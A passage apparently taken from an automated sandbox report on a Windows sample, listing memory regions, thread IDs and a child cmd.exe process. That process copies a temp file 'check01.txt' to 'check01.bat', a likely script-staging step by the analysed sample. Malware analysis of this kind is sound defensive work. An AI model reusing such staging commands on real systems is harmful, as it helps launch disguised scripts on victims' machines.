filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1404
start_va = 0x7fefcb90000
end_va = 0x7fefcba1fff
monitored = 0
entry_point = 0x7fefcb91060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1405
start_va = 0x7fefcbb0000
end_va = 0x7fefcbcefff
monitored = 0
entry_point = 0x7fefcbb5c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 1406
start_va = 0x7fefcc80000
end_va = 0x7fefccb8fff
monitored = 0
entry_point = 0x7fefcc8c0f0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1407
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1408
start_va = 0x7fefccd0000
end_va = 0x7fefccdcfff
monitored = 0
entry_point = 0x7fefccd1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 1409
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1410
start_va = 0x7fefceb0000
end_va = 0x7fefcedffff
monitored = 0
entry_point = 0x7fefceb194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1411
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1412
start_va = 0x7fefd050000
end_va = 0x7fefd056fff
monitored = 0
entry_point = 0x7fefd05142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1413
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1414
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1415
start_va = 0x7fefd1d0000
end_va = 0x7fefd201fff
monitored = 0
entry_point = 0x7fefd1d144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1416
start_va = 0x7fefd210000
end_va = 0x7fefd217fff
monitored = 0
entry_point = 0x7fefd212a6c
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 1417
start_va = 0x7fefd220000
end_va = 0x7fefd229fff
monitored = 0
entry_point = 0x7fefd223b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1418
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1419
start_va = 0x7fefd2b0000
end_va = 0x7fefd2defff
monitored = 0
entry_point = 0x7fefd2b1064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1420
start_va = 0x7fefd2f0000
end_va = 0x7fefd35cfff
monitored = 0
entry_point = 0x7fefd2f1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1421
start_va = 0x7fefd360000
end_va = 0x7fefd373fff
monitored = 0
entry_point = 0x7fefd364160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 1422
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1423
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1424
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1425
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1426
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1427
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1428
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1429
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1430
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1431
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1432
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1433
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1434
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1435
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1436
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1437
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1438
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1439
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1440
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1441
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1442
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1443
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1444
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1445
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1446
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1447
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1448
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1449
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1450
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1451
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1452
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1453
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1454
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1455
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 1456
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 1457
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 1458
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 1459
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 1460
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 1461
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 1462
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 1463
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 1464
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 1465
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 1466
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 1467
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1468
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1469
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1470
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 1471
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 1472
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1473
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1474
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1475
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1476
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1477
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1478
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1479
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1480
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1481
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1482
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1483
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1484
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1485
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1486
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1487
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 2339
start_va = 0x29e0000
end_va = 0x2afdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aero.msstyles"
filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles")
Region:
id = 2340
start_va = 0x5150000
end_va = 0x5b4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005150000"
filename = ""
Region:
id = 2341
start_va = 0x5b50000
end_va = 0x654ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005b50000"
filename = ""
Region:
id = 2342
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2343
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2344
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2345
start_va = 0x8b0000
end_va = 0x8bffff
monitored = 0
entry_point = 0x8b3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2350
start_va = 0x8c0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2603
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 2605
start_va = 0xf90000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 2606
start_va = 0x1fa0000
end_va = 0x201ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 2607
start_va = 0x20d0000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 2608
start_va = 0x2590000
end_va = 0x260ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 2609
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 2610
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 2611
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 2612
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 2821
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 2944
start_va = 0x8b0000
end_va = 0x8b5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3390
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3391
start_va = 0x8b0000
end_va = 0x8b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3512
start_va = 0x8b0000
end_va = 0x8b5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3685
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Thread:
id = 48
os_tid = 0xb7c
Thread:
id = 49
os_tid = 0xfdc
Thread:
id = 50
os_tid = 0xfc4
Thread:
id = 51
os_tid = 0x910
Thread:
id = 52
os_tid = 0xf50
Thread:
id = 53
os_tid = 0xf4c
Thread:
id = 54
os_tid = 0xf44
Thread:
id = 55
os_tid = 0x80c
Thread:
id = 56
os_tid = 0x7f4
Thread:
id = 57
os_tid = 0x68c
Thread:
id = 58
os_tid = 0x5f0
Thread:
id = 59
os_tid = 0x600
Thread:
id = 60
os_tid = 0x31c
Thread:
id = 61
os_tid = 0x47c
Thread:
id = 62
os_tid = 0x318
Thread:
id = 63
os_tid = 0x658
Thread:
id = 64
os_tid = 0x634
Thread:
id = 65
os_tid = 0x624
Thread:
id = 66
os_tid = 0x604
Thread:
id = 67
os_tid = 0x5f8
Thread:
id = 68
os_tid = 0x5e8
Thread:
id = 69
os_tid = 0x460
Thread:
id = 70
os_tid = 0x45c
Thread:
id = 71
os_tid = 0x150
Thread:
id = 72
os_tid = 0x144
Thread:
id = 73
os_tid = 0x458
Thread:
id = 74
os_tid = 0x454
Thread:
id = 75
os_tid = 0x44c
Thread:
id = 76
os_tid = 0x3f0
Thread:
id = 77
os_tid = 0x3e4
Thread:
id = 78
os_tid = 0x388
Thread:
id = 79
os_tid = 0x378
Thread:
id = 80
os_tid = 0x370
Thread:
id = 136
os_tid = 0xdf8
Thread:
id = 137
os_tid = 0xdb0
Thread:
id = 138
os_tid = 0xe88
Thread:
id = 139
os_tid = 0xda0
Process:
id = "6"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x22f35000"
os_pid = "0xb48"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "cmd.exe /c \"copy /y \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" & timeout 1\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1551
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1552
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1553
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1554
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1555
start_va = 0x4a250000
end_va = 0x4a2a8fff
monitored = 1
entry_point = 0x4a2590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 1556
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1557
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1558
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1559
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1560
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1561
start_va = 0x7fffffda000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1562
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1563
start_va = 0x50000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1564
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1565
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1566
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1567
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1568
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
